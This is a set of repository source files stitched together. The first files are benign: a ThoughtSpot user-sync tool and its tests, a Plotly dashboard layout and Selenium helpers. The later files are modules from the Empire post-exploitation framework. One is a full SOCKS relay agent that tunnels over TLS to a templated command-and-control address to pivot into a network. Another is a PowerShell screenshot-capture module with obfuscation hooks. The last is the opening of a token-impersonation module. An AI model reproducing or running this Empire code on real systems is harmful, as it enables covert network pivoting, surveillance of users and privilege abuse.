#logging.warn("\"Visibility\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Visibility\" is absent in query results. Treating as None.")
pass
u = User(
name = line[user_name_column_name],
display_name = line[self.user_field_mapping["display_name"]],
mail = line[self.user_field_mapping["mail"]],
password = line[self.user_field_mapping["password"]],
group_names = all_groups,
visibility = visibility_field
)
#add User to UsersAndGroups object
uag.add_user(u)
if groups_sql:
group_name_column_name = self.group_field_mapping["name"]
with open(groups_sql) as sql_f:
sql = sql_f.read()
cursor.execute(sql)
column_names = [col[0] for col in cursor.description]
if group_name_column_name not in column_names:
raise ValueError("No column called '%s' in query results" % group_name_column_name)
query_results = cursor.fetchall() # a list
# Create Users and also add to archive file
group_archive_filename = '{0}groups_to_sync_from_oracle{1}.csv'.format(archive_dir, current_timestamp)
with open(group_archive_filename, 'w') as group_archive_file:
group_writer = csv.DictWriter(group_archive_file, fieldnames=column_names)
group_writer.writeheader()
for tupl in query_results:
line = {} # TODO maybe change name to line_dict
for i in range(0, len(column_names)):
line.update({column_names[i]: tupl[i]})
group_writer.writerow(line)
groups_field = "[]"
groups2_field = "[]"
groups3_field = "[]"
if 'group_names' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names"] in line.keys():
groups_field_val = line[self.group_field_mapping["group_names"]]
if groups_field_val:
groups_field = groups_field_val
else:
logging.warn("\"Groups\" is NULL in query results. Treating as \"[]\".")
if 'group_names2' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names2"] in line.keys():
groups2_field_val = line[self.group_field_mapping["group_names2"]]
if groups2_field_val:
groups2_field = groups2_field_val
else:
logging.warn("\"Groups2\" is NULL in query results. Treating as \"[]\".")
if 'group_names3' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names3"] in line.keys():
groups3_field_val = line[self.group_field_mapping["group_names3"]]
if groups3_field_val:
groups3_field = groups3_field_val
else:
logging.warn("\"Groups3\" is NULL in query results. Treating as \"[]\".")
groups1, groups2, groups3 = [list(), list(), list()]  # use real lists so the concatenation below works even if literal_eval fails
try:
groups1 = ast.literal_eval(groups_field)
except:
groups_field_str = str(groups_field)
logging.warn(f"\"Groups\" column could not be evaluated as a Python list: {groups_field_str}")
try:
groups2 = ast.literal_eval(groups2_field)
except:
logging.warn("\"Groups2\" column could not be evaluated as a Python list")
try:
groups3 = ast.literal_eval(groups3_field)
except:
logging.warn("\"Groups3\" column could not be evaluated as a Python list")
all_groups = groups1 + groups2 + groups3 # assumes valid list format, e.g. ["a", "b", ...]
visibility_field = None
if 'visibility' in self.group_field_mapping.keys():
if self.group_field_mapping["visibility"] in line.keys():
visibility_field_val = line[self.group_field_mapping["visibility"]]
if visibility_field_val:
visibility_field = visibility_field_val
else:
#logging.warn("\"Visibility\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Visibility\" is absent in query results. Treating as None.")
pass
privileges_field = None
if 'privileges' in self.group_field_mapping.keys():
if self.group_field_mapping["privileges"] in line.keys():
privileges_field_val = line[self.group_field_mapping["privileges"]]
if privileges_field_val:
privileges_field = privileges_field_val
else:
#logging.warn("\"Privileges\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Privileges\" is absent in query results. Treating as None.")
pass
g = Group(
name = line[group_name_column_name],
display_name = line[self.group_field_mapping["display_name"]],
description = line[self.group_field_mapping["description"]],
group_names = all_groups,# assumes valid list format, e.g. ["a", "b", ...]
visibility = visibility_field,
privileges = privileges_field
)
#add User to UsersAndGroups object
uag.add_group(g)
cursor.close()
return uag
```
#### File: tsut/tests/test_all_users_and_groups.py
```python
import unittest
from tsut.model import UsersAndGroups, User, Group
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class TestAllUsersAndGroups(unittest.TestCase):
"""Tests the AllUsersAndGroups class."""
def test_adding_and_removing_users(self):
"""Tests adding and removing users."""
auag = UsersAndGroups()
auag.add_user(User("user1"))
auag.add_user(User("user2"))
self.assertTrue(auag.has_user("user1"))
self.assertFalse(auag.has_user("user6"))
self.assertEqual(auag.number_users(), 2)
auag.remove_user("user1")
self.assertFalse(auag.has_user("user1"))
self.assertEqual(auag.number_users(), 1)
self.assertTrue(auag.has_user("user2"))
u = auag.get_user("user2")
self.assertEqual(u.name, "user2")
self.assertIsNone(auag.get_user("noone"))
def test_duplicate_users(self):
"""Tests adding users with the same name, but duplicate in case."""
auag = UsersAndGroups()
auag.add_user(User("user1"))
with self.assertRaises(Exception):
auag.add_user(User("user1"))
with self.assertRaises(Exception):
auag.add_user(User("User1"))
self.assertEqual(auag.number_users(), 1)
self.assertTrue(auag.has_user("user1"))
self.assertTrue(auag.has_user("User1"))
auag.remove_user("user1")
self.assertFalse(auag.has_user("user1"))
self.assertEqual(auag.number_users(), 0)
def test_adding_and_removing_groups(self):
"""Tests adding and removing groups."""
auag = UsersAndGroups()
auag.add_group(Group("Group1"))
auag.add_group(Group("Group2"))
auag.add_group(Group("Group3"))
self.assertTrue(auag.has_group("Group1"))
self.assertTrue(auag.has_group("Group2"))
self.assertTrue(auag.has_group("Group3"))
self.assertEqual(auag.number_groups(), 3)
auag.remove_group("Group1")
self.assertFalse(auag.has_group("Group1"))
self.assertEqual(auag.number_groups(), 2)
self.assertTrue(auag.has_group("Group2"))
u = auag.get_group("Group2")
self.assertEqual(u.name, "Group2")
self.assertIsNone(auag.get_group("noone"))
# noinspection PyUnresolvedReferences
def test_to_json(self):
"""Tests converting to JSON"""
auag = UsersAndGroups()
auag.add_group(Group("group1"))
auag.add_group(Group("group2", group_names=["group1"]))
auag.add_user(User("user1", group_names=["group1"]))
auag.add_user(User("user2", group_names=["group1", "group2"]))
json_str = auag.to_json()
self.assertTrue(json_str.startswith("[{ "))
self.assertTrue(json_str.endswith("}]"))
self.assertTrue('"name":"user1"' in json_str)
self.assertTrue('"name":"user2"' in json_str)
self.assertTrue('"name":"group1"' in json_str)
self.assertTrue('"name":"group2"' in json_str)
def test_is_valid(self):
"""Tests validating users and groups."""
auag = UsersAndGroups()
auag.add_group(Group("group1"))
auag.add_group(Group("group2", group_names=["group1"]))
auag.add_user(User("user1", mail="<EMAIL>", group_names=["group1"]))
auag.add_user(User("user2", mail="<EMAIL>", group_names=["group1", "group2"]))
results = auag.is_valid()
self.assertTupleEqual((results.result, results.issues), (True, []))
auag.add_user(
User("user3", group_names=["group3"])
) # group3 doesn't exist.
results = auag.is_valid()
self.assertFalse(results.result)
def test_from_json(self):
json_str = """
[
{
"principalTypeEnum": "LOCAL_GROUP",
"name": "test",
"displayName": "Test Group",
"description": "Test group for validation.",
"visibility": "NON_SHARABLE"
},
{
"principalTypeEnum": "LOCAL_USER",
"name": "user_1",
"displayName": "User 1",
"password": "<PASSWORD>",
"mail": "<EMAIL>",
"groupNames": ["test"],
"visibility": "NON_SHARABLE"
}
]
"""
ugs = UsersAndGroups()
ugs.load_from_json(json_str=json_str.replace("\n", ""))
self.assertTrue(ugs.is_valid())
```
#### File: tsut/tests/test_xls_writer.py
```python
import unittest
import os
from tsut.model import UsersAndGroups, User, Group
from tsut.io import UGXLSWriter
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class TestUGXLSWriter(unittest.TestCase):
"""Tests the AllUsersAndGroups class."""
def test_write_to_xls(self):
"""Tests writing users and groups."""
uags = UsersAndGroups()
uags.add_group(
Group(
name="Group 1",
display_name="This is Group 1",
description="A group for testing.",
group_names=[],
)
)
uags.add_group(
Group(
name="Group 2",
display_name="This is Group 2",
description="Another group for testing.",
group_names=["Group 1"],
)
)
uags.add_group(
Group(
name='Group "3"',
display_name='This is Group "3"',
description='Another "group" for testing.',
group_names=["Group 1", "Group 2"],
)
)
uags.add_user(
User(
name="User1",
password="<PASSWORD>",
display_name="User 1",
mail="<EMAIL>",
group_names=["Group 1"],
)
)
uags.add_user(
User(
name="User2",
password="<PASSWORD>",
display_name="User 2",
mail="<EMAIL>",
group_names=["Group 1", "Group 2"],
)
)
# Testing for ability to handle embedded quotes.
uags.add_user(
User(
name='User "3"',
password="<PASSWORD>",
display_name='User "3"',
mail="<EMAIL>",
group_names=['Group "3"'],
)
)
writer = UGXLSWriter()
writer.write(uags, "test_uags")
os.remove("test_uags.xlsx")
``` |
{
"source": "Jim-Shaddix/Neutron-Scattering-Dashboard",
"score": 3
} |
#### File: Jim-Shaddix/Neutron-Scattering-Dashboard/layout.py
```python
import plotly.graph_objects as go
from __init__ import intensity, heatmap_x_ticktext, heatmap_x_tickvals, heatmap_y_ticktext, heatmap_y_tickvals, heatmap_hovertemplate
def xaxis_title(title):
xaxis = go.layout.xaxis.Title(
text=title
)
return xaxis
def yaxis_title(title):
yaxis = go.layout.yaxis.Title(
text=title
)
return yaxis
layout_heatmap = go.Layout(
title=go.layout.Title(text="Intensity (arb. units)", xref="paper", x=0.5),
width=450,
height=350,
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
xaxis=go.layout.XAxis(showgrid=False, zeroline=False,
tickvals=heatmap_x_tickvals,
ticktext=heatmap_x_ticktext,
title=xaxis_title("[1K0] (r.l.u.)")
),
yaxis=go.layout.YAxis(showgrid=False, zeroline=False,
tickvals=heatmap_y_tickvals,
ticktext=heatmap_y_ticktext,
title=yaxis_title("Energy Transfer (meV)")
),
margin=go.layout.Margin(
l=50,
r=0,
b=0,
t=30,
pad=0
)
)
layout_cross = go.Layout(
title=go.layout.Title(text="Cross Section", xref="paper", x=0.5),
width=380,
height=350,
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
xaxis=go.layout.XAxis(
showline=True, linewidth=2, linecolor='black', mirror=True,
showgrid=True, gridwidth=1, gridcolor='LightGrey',
zeroline=True, zerolinewidth=2, zerolinecolor='LightGrey',
title=xaxis_title("X axis")
),
yaxis=go.layout.YAxis(
showline=True, linewidth=2, linecolor='black', mirror=True,
showgrid=True, gridwidth=1, gridcolor='LightGrey',
zeroline=True, zerolinewidth=2, zerolinecolor='LightGrey',
title=yaxis_title("Intensity (arb. units)")
),
margin=go.layout.Margin(
l=50,
r=20,
b=0,
t=30,
pad=0
)
)
# Data for the Heat Map
trace_heatmap = go.Heatmap(
z=intensity,
showscale=True,
colorscale=[
[0, 'rgb(0, 0, 0)'], # black
[0.1, 'rgb(153, 51, 255)'], # purple
[0.2, 'rgb(51, 51, 255)'], # blue
[0.3, 'rgb(51, 153, 255)'], # light blue
[0.4, 'rgb(51, 255, 255)'], # teal
[0.5, 'rgb(51, 255, 153)'], # light green
[0.6, 'rgb(51, 255, 51)'], # green
[0.7, 'rgb(153, 255, 51)'], # yellow green
[0.8, 'rgb(255, 255, 51)'], # yellow
[0.9, 'rgb(255, 153, 51)'], # orange
[1, 'rgb(255, 51, 51)'] # red
],
hovertemplate=heatmap_hovertemplate
)
``` |
{
"source": "Jim-Shaddix/spring-demos",
"score": 3
} |
#### File: lib/util/WebDriverUtil.py
```python
from typing import List
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.common.by import By
def next_element(driver: WebDriver, elem: WebElement) -> WebElement:
next_sibiling = driver.execute_script("""
return arguments[0].nextElementSibling
""", elem)
return next_sibiling
def css_select(element, css_selector) -> WebElement:
return element.find_element(by=By.CSS_SELECTOR, value=css_selector)
def css_select_all(element, css_selector) -> List[WebElement]:
return element.find_elements(by=By.CSS_SELECTOR, value=css_selector)
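# Illustrative (hypothetical) usage, given an already-constructed Chrome WebDriver `driver`:
#   heading = css_select(driver, "h1.title")
#   links = css_select_all(driver, "a.nav-link")
#   sibling = next_element(driver, heading)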
```
#### File: whoami/parsing/main.py
```python
import sys
from lib.parser.ResponseCodeParser import ResponseCodeParser
from lib.parser.HeaderParser import HeaderParser
from lib.parser.RequestMethodParser import RequestMethodParser
from lib.config.config import Config
def main():
header_website = sys.argv[0]
response_code_website = sys.argv[1]
request_header_website = sys.argv[2]
web_driver_path = sys.argv[3]
HeaderParser.execute(Config.get_webdriver(header_website, web_driver_path))
ResponseCodeParser.execute(Config.get_webdriver(response_code_website, web_driver_path))
RequestMethodParser.execute(Config.get_webdriver(request_header_website, web_driver_path))
if __name__ == "__main__":
main()
``` |
{
"source": "jimshew/Empire",
"score": 2
} |
#### File: python/management/socks-src.py
```python
from builtins import next
from builtins import hex
from builtins import object
import argparse
import logging
import random
import select
import shlex
import signal
import socket
import ssl
import struct
import sys
MTYPE_NOOP = 0x00 # No-op. Used for keepalive messages
MTYPE_COPEN = 0x01 # Open Channel messages
MTYPE_CCLO = 0x02 # Close Channel messages
MTYPE_CADDR = 0x03 # Channel Address (remote endpoint address info)
MTYPE_DATA = 0x10 # Data messages
def recvall(s, size):
data = ''
while len(data) < size:
d = s.recv(size - len(data))
if not d:
break
data += d
return data
def integer_generator(seed=random.randint(0, 0xffffffff)):
while True:
seed = (seed + 1) % 0xffffffff
yield seed
class Message(object):
""" Container class with (un)serialization methods """
M_HDR_STRUCT = struct.Struct('!BII') # Message Type | Channel ID | Payload Size
def __init__(self, mtype=MTYPE_NOOP, channel=0, size=0):
self.mtype = mtype
self.channel = channel
self.size = size
def __str__(self):
return '<Message type={} channel={}>'.format(self.mtype, self.channel)
@classmethod
def unpack(cls, data):
if len(data) < cls.M_HDR_STRUCT.size:
raise ValueError('Attempting to unpack a Message header from too little data')
return Message(*cls.M_HDR_STRUCT.unpack(data[:cls.M_HDR_STRUCT.size])), data[cls.M_HDR_STRUCT.size:]
def pack(self, data=''):
self.size = len(data)
return self.M_HDR_STRUCT.pack(self.mtype, self.channel, self.size) + data
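# Illustrative example (not executed): a DATA message for channel 7 carrying 'hello' packs to
#   '\x10' + '\x00\x00\x00\x07' + '\x00\x00\x00\x05' + 'hello'
# i.e. a 1-byte type, 4-byte channel id and 4-byte payload length header followed by the payload.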
class Channel(object):
""" Container class with remote socket and channel id """
def __init__(self):
self.socket = None # type: socket.socket
self.channel_id = None
self.remote_peer_addr = None
self.local_peer_addr = None
self.socks_handler = SocksHandler()
self.logger = logging.getLogger(self.__class__.__name__)
def __str__(self):
return '<Channel id={} remote_addr={} local_addr={}>'.format(self.channel_id, self.remote_peer_addr, self.local_peer_addr)
@property
def connected(self):
return isinstance(self.socket, socket.socket)
def fileno(self):
return self.socket.fileno()
def close(self):
self.logger.debug('Closing channel {}'.format(self))
if self.connected:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except Exception as e:
self.logger.debug('Unable to close channel: {}'.format(e))
self.socket = None
class Tunnel(object):
""" Container class with connected transport socket, list of Channels, and methods for passing Messages """
def __init__(self, transport_socket):
self.channels = [] # List[Channel]
self.transport_socket = transport_socket # type: socket.socket
self.logger = logging.getLogger(self.__class__.__name__)
def send_message(self, msg, data=''):
self.logger.debug('Sending {}'.format(msg))
try:
self.transport_socket.sendall(msg.pack(data))
except (socket.error, TypeError) as e:
self.logger.critical('Problem sending a message over transport: {}'.format(e))
sys.exit(255)
def recv_message(self):
try:
msg, _ = Message.unpack(recvall(self.transport_socket, Message.M_HDR_STRUCT.size))
except socket.error as e:
self.logger.critical('Problem receiving a message over transport: {}'.format(e))
sys.exit(255)
return msg, recvall(self.transport_socket, msg.size)
def get_channel_by_id(self, channel_id):
for c in self.channels:
if c.channel_id == channel_id:
return c
raise KeyError('Invalid channel number "{}"'.format(channel_id))
def open_channel(self, channel_id, remote=False):
c = Channel()
c.channel_id = channel_id
self.channels.append(c)
if remote:
msg = Message(mtype=MTYPE_COPEN, channel=c.channel_id)
self.send_message(msg)
return c
def close_channel(self, channel_id, remote=False):
for c in self.channels:
if c.channel_id == channel_id:
c.close()
self.channels.remove(c)
self.logger.info('Closed channel: {}'.format(c))
break
if remote:
msg = Message(mtype=MTYPE_CCLO, channel=channel_id)
self.send_message(msg)
return
class SocksHandler(object):
SOCKS5_AUTH_METHODS = {
0x00: 'No Authentication Required',
0x01: 'GSSAPI',
0x02: 'USERNAME/PASSWORD',
0xFF: 'NO ACCEPTABLE METHODS'
}
def __init__(self):
self.auth_handled = False
self.request_handled = False
self.logger = logging.getLogger(self.__class__.__name__)
def handle(self, channel, data):
# SOCKSv5 Auth message
if not self.auth_handled:
data = [ord(x) for x in data]
# Expecting [VERSION | NMETHODS | METHODS] (VERSION must be 0x05)
if len(data) < 2 or data[0] != 0x05 or len(data[2:]) != data[1]:
return struct.pack('BB', 0x05, 0xFF) # No Acceptable Auth Methods
methods = [self.SOCKS5_AUTH_METHODS.get(x, hex(x)) for x in data[2:]]
self.logger.debug('Received SOCKS auth request: {}'.format(', '.join(methods)))
self.auth_handled = True
return struct.pack('BB', 0x05, 0x00) # No Auth Required
elif not self.request_handled:
if len(data) < 4 or ord(data[0]) != 0x05:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
cmd = ord(data[1])
rsv = ord(data[2])
atyp = ord(data[3])
if cmd not in [0x01, 0x02, 0x03]:
return struct.pack('!BBBBIH', 0x05, 0x07, 0x00, 0x01, 0, 0) # Command not supported
if rsv != 0x00:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
if atyp not in [0x01, 0x03, 0x04]:
return struct.pack('!BBBBIH', 0x05, 0x08, 0x00, 0x01, 0, 0) # Address type not supported
if cmd == 0x01: # CONNECT
if atyp == 0x01: # IPv4
if len(data) != 10:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = socket.inet_ntop(socket.AF_INET, data[4:8])
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET
elif atyp == 0x03: # FQDN
size = ord(data[4])
if len(data[5:]) != size + 2:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = data[5:5+size]
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET
atyp = 0x01
elif atyp == 0x04: # IPv6
if len(data) != 22:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = socket.inet_ntop(socket.AF_INET6, data[4:20])  # IPv6 address occupies bytes 4-19 of the request
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET6
else:
raise NotImplementedError('Failed to implement handler for atype={}'.format(hex(atyp)))
self.logger.debug('Received SOCKSv5 CONNECT request for {}:{}'.format(host, port))
try:
s = socket.socket(af)
s.settimeout(2)
s.connect((host, port))
except socket.timeout:
return struct.pack('!BBBBIH', 0x05, 0x04, 0x00, 0x01, 0, 0) # host unreachable
except socket.error:
return struct.pack('!BBBBIH', 0x05, 0x05, 0x00, 0x01, 0, 0) # connection refused
except Exception:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
s.settimeout(None)
channel.socket = s
peer_host, peer_port = s.getpeername()[:2]
channel.local_peer_addr = '{}[{}]:{}'.format(host, peer_host, port)
local_host, local_port = s.getsockname()[:2]
bind_addr = socket.inet_pton(af, local_host)
bind_port = struct.pack('!H', local_port)
ret = struct.pack('!BBBB', 0x05, 0x00, 0x00, atyp) + bind_addr + bind_port
self.logger.info('Connected {}'.format(channel))
self.request_handled = True
return ret
elif cmd == 0x02: # BIND
raise NotImplementedError('Need to implement BIND command') # TODO
elif cmd == 0x03: # UDP ASSOCIATE
raise NotImplementedError('Need to implement UDP ASSOCIATE command') # TODO
else:
raise NotImplementedError('Failed to implemented handler for cmd={}'.format(hex(cmd)))
class SocksBase(object):
def __init__(self, transport_addr=('', 443), socks_addr=('', 1080), keepalive=None, key=None, cert=None):
self.tunnel = None # type: Tunnel
self.transport_addr = transport_addr
self.socks_addr = socks_addr
self.keepalive = keepalive
self.socks_socket = None # type: socket.socket
self.next_channel_id = integer_generator()
self.key = key
self.cert = cert
self.logger = logging.getLogger(self.__class__.__name__)
def check_socks_protocol(self, c, data):
return False
def monitor_sockets(self):
while True:
# Check tunnel and peer connections
sockets = [x for x in self.tunnel.channels if x.connected] + [self.tunnel.transport_socket]
if self.socks_socket is not None:
sockets.append(self.socks_socket)
try:
r, _, _ = select.select(sockets, [], [], self.keepalive)
except select.error:
continue
if not r:
msg = Message(mtype=MTYPE_NOOP) # timeout, send keepalive
self.tunnel.send_message(msg)
continue
if self.tunnel.transport_socket in r:
try:
msg, data = self.tunnel.recv_message()
except Exception as e:
self.logger.critical('Error receiving messages, exiting')
self.logger.debug('Error message: {}'.format(e))
self.tunnel.transport_socket.close()
return
if msg.mtype == MTYPE_NOOP:
self.logger.debug('Received keepalive message, discarding')
elif msg.mtype == MTYPE_COPEN:
c = self.tunnel.open_channel(msg.channel)
self.logger.debug('Received OpenChannel message, opened channel: {}'.format(c))
elif msg.mtype == MTYPE_CCLO:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
self.tunnel.close_channel(msg.channel)
except KeyError:
pass
else:
self.logger.info('Closed a channel: {}'.format(c))
elif msg.mtype == MTYPE_CADDR:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
except KeyError:
pass
else:
c.remote_peer_addr = data
self.logger.info('Channel connected remotely: {}'.format(c))
elif msg.mtype == MTYPE_DATA:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
except KeyError:
pass
else:
self.logger.debug('Received {} bytes from tunnel for {}'.format(len(data), c))
if not self.check_socks_protocol(c, data):
try:
c.socket.sendall(data)
except:
self.logger.debug('Problem sending data to channel {}'.format(c))
self.tunnel.close_channel(msg.channel, remote=True)
else:
self.logger.warning('Received message of unknown type {}'.format(hex(msg.mtype)))
continue
if self.socks_socket is not None and self.socks_socket in r:
s, addr = self.socks_socket.accept()
addr = '{}:{}'.format(*addr)
c = self.tunnel.open_channel(next(self.next_channel_id), remote=True)
c.local_peer_addr = addr
c.socket = s
self.logger.info('Created new channel: {}'.format(c))
continue
for c in r:
try:
data = c.socket.recv(1024)
except Exception as e:
self.logger.debug('Problem recving from {}: {}'.format(c, e))
self.tunnel.close_channel(c.channel_id, remote=True)
break
if not data:
self.logger.debug('Received EOF from local socket, closing channel')
self.tunnel.close_channel(c.channel_id, remote=True)
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=data)
self.logger.debug('Sent {} bytes over tunnel: {}'.format(len(data), msg))
def run(self):
raise NotImplementedError('Subclasses should implement the run() method')
class SocksRelay(SocksBase):
def check_socks_protocol(self, c, data):
if not c.socks_handler.auth_handled:
res = c.socks_handler.handle(c, data)
if not c.socks_handler.auth_handled:
self.logger.warning('SOCKS auth handler failed, expect channel close for {}'.format(c))
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=res)
return True
elif not c.socks_handler.request_handled:
res = c.socks_handler.handle(c, data)
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=res)
if not c.socks_handler.request_handled:
self.logger.warning('SOCKS req handler failed, expect channel close for {}'.format(c))
else:
msg = Message(mtype=MTYPE_CADDR, channel=c.channel_id)
self.tunnel.send_message(msg, data=c.local_peer_addr)
return True
else:
return False
def run(self):
s = socket.socket()
s = ssl.wrap_socket(s)
self.logger.debug('Connecting to {}:{}'.format(*self.transport_addr))
try:
s.connect(self.transport_addr)
except Exception as e:
self.logger.error('Problem connecting to server: {}'.format(e))
else:
self.logger.info('Connected to {}:{}'.format(*self.transport_addr))
self.tunnel = Tunnel(s)
self.monitor_sockets()
self.logger.warning('SOCKS relay is exiting')
def relay_main(tunnel_addr=''):
tunnel_addr = (tunnel_addr.split(':')[0], int(tunnel_addr.split(':')[1]))
relay = SocksRelay(transport_addr=tunnel_addr)
relay.run()
return
relay_main(tunnel_addr='${TUNNEL_ADDR}')
```
#### File: powershell/collection/screenshot.py
```python
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Get-Screenshot',
'Author': ['@obscuresec', '@harmj0y'],
'Description': ('Takes a screenshot of the current desktop and '
'returns the output as a .PNG.'),
'Background' : False,
'OutputExtension' : 'png',
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Ratio' : {
'Description' : "JPEG Compression ratio: 1 to 100.",
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Get-Screenshot
{
param
(
[Parameter(Mandatory = $False)]
[string]
$Ratio
)
Add-Type -Assembly System.Windows.Forms;
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen;
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height;
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject);
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size);
$DrawingGraphics.Dispose();
$ms = New-Object System.IO.MemoryStream;
if ($Ratio) {
try {
$iQual = [convert]::ToInt32($Ratio);
} catch {
$iQual=80;
}
if ($iQual -gt 100){
$iQual=100;
} elseif ($iQual -lt 1){
$iQual=1;
}
$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq \"JPEG\" }
$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
} else {
$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
}
$ScreenshotObject.Dispose();
[convert]::ToBase64String($ms.ToArray());
}
Get-Screenshot"""
if self.options['Ratio']['Value']:
if self.options['Ratio']['Value']!='0':
self.info['OutputExtension'] = 'jpg'
else:
self.options['Ratio']['Value'] = ''
self.info['OutputExtension'] = 'png'
else:
self.info['OutputExtension'] = 'png'
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
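# --- Illustrative sketch (not from Empire itself) ---
# The loop above turns the module options into PowerShell arguments: options whose
# value is "true" become bare switches, everything else becomes "-Name Value".
# A standalone version of that string-building logic, with a hypothetical example:
def _append_options(command, options):
    for name, meta in options.items():
        value = meta.get('Value', '')
        if name.lower() == 'agent' or not value:
            continue
        if str(value).lower() == 'true':
            command += ' -' + name          # switch option
        else:
            command += ' -' + name + ' ' + str(value)
    return command

# _append_options('Get-Screenshot', {'Ratio': {'Value': '50'}}) -> 'Get-Screenshot -Ratio 50'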
```
#### File: powershell/credentials/tokens.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-TokenManipulation',
'Author': ['@JosephBialek'],
'Description': ("Runs PowerSploit's Invoke-TokenManipulation to "
"enumerate Logon Tokens available and uses "
"them to create new processes. Similar to "
"Incognito's functionality. Note: if you select "
"ImpersonateUser or CreateProcess, you must specify "
"one of Username, ProcessID, Process, or ThreadId."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
